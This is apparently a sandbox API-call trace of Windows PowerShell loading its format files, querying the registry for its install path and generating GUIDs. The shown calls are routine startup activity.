	[0402.368] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.368] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.368] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.368] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.369] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.369] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.369] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.369] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.370] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.371] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.371] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.371] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.371] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0xe67, lpOverlapped=0x0) returned 1
	[0402.371] ReadFile (in: hFile=0x1c8, lpBuffer=0x300e8e7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300e8e7*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0402.371] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0402.372] CloseHandle (hObject=0x1c8) returned 1
	[0402.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0402.372] SetErrorMode (uMode=0x1) returned 0x1
	[0402.372] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d420 | out: lpFileInformation=0x28d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0402.372] SetErrorMode (uMode=0x1) returned 0x1
	[0402.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0402.372] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d508 | out: phkResult=0x28d508*=0x1c8) returned 0x0
	[0402.372] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d48c, lpData=0x0, lpcbData=0x28d488*=0x0 | out: lpType=0x28d48c*=0x1, lpData=0x0, lpcbData=0x28d488*=0x56) returned 0x0
	[0402.372] CoTaskMemAlloc (cb=0x5a) returned 0x1885d0
	[0402.372] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d45c, lpData=0x1885d0, lpcbData=0x28d458*=0x56 | out: lpType=0x28d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d458*=0x56) returned 0x0
	[0402.373] CoTaskMemFree (pv=0x1885d0) 
	[0402.373] RegCloseKey (hKey=0x1c8) returned 0x0
	[0402.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0402.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0402.374] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x7e8a04bb, Data2=0xe8d4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0x44, [2]=0xe2, [3]=0x14, [4]=0x97, [5]=0x99, [6]=0x6, [7]=0xb0))) returned 0x0
	[0402.374] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xd4f202c8, Data2=0x15ce, Data3=0x4a5d, Data4=([0]=0x88, [1]=0x2b, [2]=0xa9, [3]=0xeb, [4]=0x86, [5]=0xc0, [6]=0x20, [7]=0xe5))) returned 0x0
	[0402.375] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x65b88755, Data2=0x79fc, Data3=0x41d3, Data4=([0]=0xa4, [1]=0x46, [2]=0x36, [3]=0x12, [4]=0x22, [5]=0x6, [6]=0xc7, [7]=0xc6))) returned 0x0
	[0402.375] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x8f8dedee, Data2=0x6351, Data3=0x4025, Data4=([0]=0x80, [1]=0xf8, [2]=0x51, [3]=0x72, [4]=0x62, [5]=0xc3, [6]=0xfc, [7]=0x3a))) returned 0x0
	[0402.375] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x45d68bdc, Data2=0xc5b2, Data3=0x465f, Data4=([0]=0x83, [1]=0xd4, [2]=0xc6, [3]=0x9a, [4]=0x45, [5]=0x1b, [6]=0x92, [7]=0xe8))) returned 0x0
	[0402.375] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xa1514e58, Data2=0x7c41, Data3=0x4deb, Data4=([0]=0x8f, [1]=0xd4, [2]=0xe4, [3]=0x54, [4]=0x7, [5]=0xd6, [6]=0x33, [7]=0x52))) returned 0x0
	[0402.375] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x220ca747, Data2=0x692a, Data3=0x4637, Data4=([0]=0xbf, [1]=0xa0, [2]=0xb9, [3]=0xd2, [4]=0xc5, [5]=0xd2, [6]=0x75, [7]=0xe2))) returned 0x0
	[0402.375] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.375] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x73204271, Data2=0x294a, Data3=0x48c4, Data4=([0]=0xaf, [1]=0x14, [2]=0xe1, [3]=0x9a, [4]=0xd7, [5]=0x26, [6]=0x49, [7]=0xcd))) returned 0x0
	[0402.375] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x50de93e8, Data2=0x3a72, Data3=0x4637, Data4=([0]=0x8b, [1]=0x72, [2]=0xf0, [3]=0xe2, [4]=0x9c, [5]=0x79, [6]=0x7b, [7]=0xc7))) returned 0x0
	[0402.375] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x1e6247d9, Data2=0xe4de, Data3=0x419e, Data4=([0]=0x83, [1]=0xcd, [2]=0xda, [3]=0x4e, [4]=0x4f, [5]=0x4f, [6]=0xf3, [7]=0x34))) returned 0x0
	[0402.376] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x2922cfc9, Data2=0x1586, Data3=0x43c5, Data4=([0]=0xb3, [1]=0xb8, [2]=0xe5, [3]=0x19, [4]=0x7a, [5]=0x7b, [6]=0xd7, [7]=0xba))) returned 0x0
	[0402.376] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x27873f8d, Data2=0xf82c, Data3=0x4c06, Data4=([0]=0x97, [1]=0x94, [2]=0x7e, [3]=0xe0, [4]=0xb9, [5]=0xb5, [6]=0x3e, [7]=0x9d))) returned 0x0
	[0402.376] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xac542315, Data2=0x8d79, Data3=0x4773, Data4=([0]=0xa5, [1]=0x2f, [2]=0x17, [3]=0xe2, [4]=0x16, [5]=0x9c, [6]=0x79, [7]=0x34))) returned 0x0
	[0402.376] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x283c461d, Data2=0x3d24, Data3=0x4228, Data4=([0]=0x81, [1]=0xdd, [2]=0xad, [3]=0x67, [4]=0x68, [5]=0x2c, [6]=0xec, [7]=0x28))) returned 0x0
	[0402.376] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x62464235, Data2=0x2a6d, Data3=0x4d34, Data4=([0]=0xbe, [1]=0x6e, [2]=0x52, [3]=0x7a, [4]=0x26, [5]=0x7f, [6]=0x78, [7]=0x24))) returned 0x0
	[0402.376] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xf3c5bb0a, Data2=0x5bdd, Data3=0x4d50, Data4=([0]=0x9b, [1]=0x10, [2]=0x1a, [3]=0xaa, [4]=0x75, [5]=0xc5, [6]=0x3a, [7]=0xb3))) returned 0x0
	[0402.376] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xf69606d6, Data2=0x6f5d, Data3=0x463f, Data4=([0]=0xaa, [1]=0xc4, [2]=0xf3, [3]=0x9b, [4]=0xa0, [5]=0xf3, [6]=0xb3, [7]=0x11))) returned 0x0
	[0402.376] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xdd1a6155, Data2=0x8ad7, Data3=0x46f3, Data4=([0]=0xae, [1]=0x9b, [2]=0x80, [3]=0x27, [4]=0x32, [5]=0xe4, [6]=0xef, [7]=0xb1))) returned 0x0
	[0402.376] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xb687c436, Data2=0x147c, Data3=0x40c9, Data4=([0]=0x8e, [1]=0xb2, [2]=0x79, [3]=0x2c, [4]=0xf3, [5]=0x2e, [6]=0xd1, [7]=0x44))) returned 0x0
	[0402.377] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.377] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.377] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.377] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x8d1e1ef4, Data2=0xf971, Data3=0x453e, Data4=([0]=0xa9, [1]=0xea, [2]=0x89, [3]=0x5f, [4]=0x30, [5]=0x29, [6]=0x79, [7]=0x9b))) returned 0x0
	[0402.377] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x265095c0, Data2=0x940c, Data3=0x466e, Data4=([0]=0x92, [1]=0x8f, [2]=0xfd, [3]=0x3f, [4]=0x53, [5]=0x62, [6]=0xa9, [7]=0x8e))) returned 0x0
	[0402.377] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xc632abf2, Data2=0xd880, Data3=0x4d28, Data4=([0]=0xa3, [1]=0x7b, [2]=0xa1, [3]=0x91, [4]=0xf3, [5]=0x44, [6]=0x21, [7]=0xa2))) returned 0x0
	[0402.377] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xcbe7f7d4, Data2=0x42d3, Data3=0x4fe0, Data4=([0]=0xaf, [1]=0xc1, [2]=0xdd, [3]=0x6c, [4]=0xf5, [5]=0x8b, [6]=0x48, [7]=0xba))) returned 0x0
	[0402.377] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xdf944e13, Data2=0x9b9f, Data3=0x4e9d, Data4=([0]=0xac, [1]=0x47, [2]=0xda, [3]=0x5d, [4]=0xdc, [5]=0x37, [6]=0x9e, [7]=0x9e))) returned 0x0
	[0402.378] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xcf09d622, Data2=0x40c2, Data3=0x4494, Data4=([0]=0xab, [1]=0x6, [2]=0xa5, [3]=0xac, [4]=0x7e, [5]=0x77, [6]=0xbf, [7]=0xa9))) returned 0x0
	[0402.378] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xf281cf4d, Data2=0x4e88, Data3=0x4eb0, Data4=([0]=0x83, [1]=0xdb, [2]=0x10, [3]=0xf2, [4]=0xc6, [5]=0x7, [6]=0x24, [7]=0x87))) returned 0x0
	[0402.378] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x3c847d97, Data2=0x96c4, Data3=0x462b, Data4=([0]=0x83, [1]=0xc9, [2]=0x47, [3]=0xc0, [4]=0xdf, [5]=0x75, [6]=0x9b, [7]=0xdb))) returned 0x0
	[0402.378] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xf4522a55, Data2=0x5574, Data3=0x4dca, Data4=([0]=0x9c, [1]=0x3f, [2]=0x23, [3]=0xc6, [4]=0xce, [5]=0x93, [6]=0x26, [7]=0x79))) returned 0x0
	[0402.378] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xcf66b2b9, Data2=0x9a72, Data3=0x46c6, Data4=([0]=0x82, [1]=0xad, [2]=0xe6, [3]=0xe8, [4]=0x7d, [5]=0xb1, [6]=0x68, [7]=0x3a))) returned 0x0
	[0402.378] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xa677873a, Data2=0x67c6, Data3=0x4b30, Data4=([0]=0xa3, [1]=0xe0, [2]=0xc0, [3]=0x7f, [4]=0x3b, [5]=0x33, [6]=0x69, [7]=0xf8))) returned 0x0
	[0402.378] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x1e483dc9, Data2=0xae37, Data3=0x43a4, Data4=([0]=0x9b, [1]=0xc8, [2]=0xe8, [3]=0x31, [4]=0x3f, [5]=0xe, [6]=0x6d, [7]=0xc6))) returned 0x0
	[0402.378] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xd291f36d, Data2=0x2661, Data3=0x43a9, Data4=([0]=0x9b, [1]=0xca, [2]=0x48, [3]=0x8d, [4]=0x92, [5]=0xb7, [6]=0x90, [7]=0x46))) returned 0x0
	[0402.378] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.379] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xff7aa4e4, Data2=0x1ce4, Data3=0x4602, Data4=([0]=0xa1, [1]=0xf9, [2]=0x57, [3]=0x17, [4]=0x5, [5]=0x50, [6]=0x6f, [7]=0x8e))) returned 0x0
	[0402.379] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.379] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.380] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x10b00dcb, Data2=0xf447, Data3=0x4778, Data4=([0]=0x96, [1]=0x74, [2]=0x3e, [3]=0x38, [4]=0x31, [5]=0x6a, [6]=0x39, [7]=0x3b))) returned 0x0
	[0402.380] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.380] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x63d44232, Data2=0x41ab, Data3=0x4bc8, Data4=([0]=0xbd, [1]=0xf1, [2]=0x5b, [3]=0x2, [4]=0x48, [5]=0x95, [6]=0x91, [7]=0xef))) returned 0x0
	[0402.380] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xd3107c42, Data2=0x2a25, Data3=0x4c2e, Data4=([0]=0xb5, [1]=0xd4, [2]=0xd0, [3]=0x92, [4]=0x14, [5]=0x22, [6]=0xfc, [7]=0xf1))) returned 0x0
	[0402.380] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x451eb962, Data2=0x3abd, Data3=0x4fe5, Data4=([0]=0xbb, [1]=0x99, [2]=0xe2, [3]=0x5c, [4]=0x6b, [5]=0x20, [6]=0xd9, [7]=0x4f))) returned 0x0
	[0402.381] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xfe7701ce, Data2=0x6588, Data3=0x4f7e, Data4=([0]=0xbf, [1]=0x78, [2]=0x20, [3]=0xc5, [4]=0x19, [5]=0xc6, [6]=0xa0, [7]=0xa4))) returned 0x0
	[0402.381] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x9a2c9b5d, Data2=0xea34, Data3=0x449c, Data4=([0]=0x81, [1]=0xb5, [2]=0x86, [3]=0x4d, [4]=0x8, [5]=0x2b, [6]=0x3e, [7]=0x86))) returned 0x0
	[0402.381] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xf4c59798, Data2=0xaf9a, Data3=0x41dd, Data4=([0]=0x8e, [1]=0x43, [2]=0xf8, [3]=0x33, [4]=0xde, [5]=0x1f, [6]=0xd7, [7]=0xcf))) returned 0x0
	[0402.381] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x5dce9b70, Data2=0xd099, Data3=0x4dcb, Data4=([0]=0x96, [1]=0xca, [2]=0x8b, [3]=0xa4, [4]=0x74, [5]=0xb6, [6]=0x4a, [7]=0xae))) returned 0x0
	[0402.381] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.381] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x784621c1, Data2=0x1830, Data3=0x4b51, Data4=([0]=0x92, [1]=0x97, [2]=0xf8, [3]=0xeb, [4]=0x23, [5]=0xd, [6]=0xcc, [7]=0x45))) returned 0x0
	[0402.381] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x71e217af, Data2=0x50a4, Data3=0x4511, Data4=([0]=0xa8, [1]=0x37, [2]=0xe, [3]=0xde, [4]=0x66, [5]=0x20, [6]=0x4a, [7]=0x9b))) returned 0x0
	[0402.381] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xc2a15586, Data2=0xb67f, Data3=0x4176, Data4=([0]=0x9e, [1]=0xdd, [2]=0xd4, [3]=0x16, [4]=0xed, [5]=0x6d, [6]=0xe, [7]=0xe5))) returned 0x0
	[0402.382] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x65b0241, Data2=0xa3c2, Data3=0x43b1, Data4=([0]=0x9b, [1]=0x13, [2]=0xa2, [3]=0xd3, [4]=0x53, [5]=0xf2, [6]=0xf5, [7]=0xa))) returned 0x0
	[0402.382] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xb7128ce5, Data2=0xe511, Data3=0x4481, Data4=([0]=0x9e, [1]=0x98, [2]=0xe1, [3]=0x5f, [4]=0xbb, [5]=0xb5, [6]=0x6f, [7]=0xf4))) returned 0x0
	[0402.382] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.382] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x7b7fd719, Data2=0xf0a, Data3=0x47eb, Data4=([0]=0xa4, [1]=0x63, [2]=0x1a, [3]=0x53, [4]=0xe8, [5]=0x3, [6]=0xd2, [7]=0x9b))) returned 0x0
	[0402.382] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x668eaab9, Data2=0x9154, Data3=0x4669, Data4=([0]=0x9b, [1]=0xab, [2]=0x12, [3]=0xad, [4]=0xfa, [5]=0xb8, [6]=0x40, [7]=0x98))) returned 0x0
	[0402.382] VirtualQuery (in: lpAddress=0x28c150, lpBuffer=0x28d010, dwLength=0x30 | out: lpBuffer=0x28d010*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.382] VirtualQuery (in: lpAddress=0x28c150, lpBuffer=0x28d010, dwLength=0x30 | out: lpBuffer=0x28d010*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.382] VirtualQuery (in: lpAddress=0x28c150, lpBuffer=0x28d010, dwLength=0x30 | out: lpBuffer=0x28d010*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.382] VirtualQuery (in: lpAddress=0x28c150, lpBuffer=0x28d010, dwLength=0x30 | out: lpBuffer=0x28d010*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0402.383] SetErrorMode (uMode=0x1) returned 0x1
	[0402.383] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0402.383] GetFileType (hFile=0x1c8) returned 0x1
	[0402.383] SetErrorMode (uMode=0x1) returned 0x1
	[0402.383] GetFileType (hFile=0x1c8) returned 0x1
	[0402.383] ReadFile (in: hFile=0x1c8, lpBuffer=0x316d2b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x316d2b0*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.384] ReadFile (in: hFile=0x1c8, lpBuffer=0x316d2b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x316d2b0*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.384] ReadFile (in: hFile=0x1c8, lpBuffer=0x316d2b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x316d2b0*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.384] ReadFile (in: hFile=0x1c8, lpBuffer=0x316d2b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x316d2b0*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.385] ReadFile (in: hFile=0x1c8, lpBuffer=0x316d2b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x316d2b0*, lpNumberOfBytesRead=0x28d478*=0x8b4, lpOverlapped=0x0) returned 1
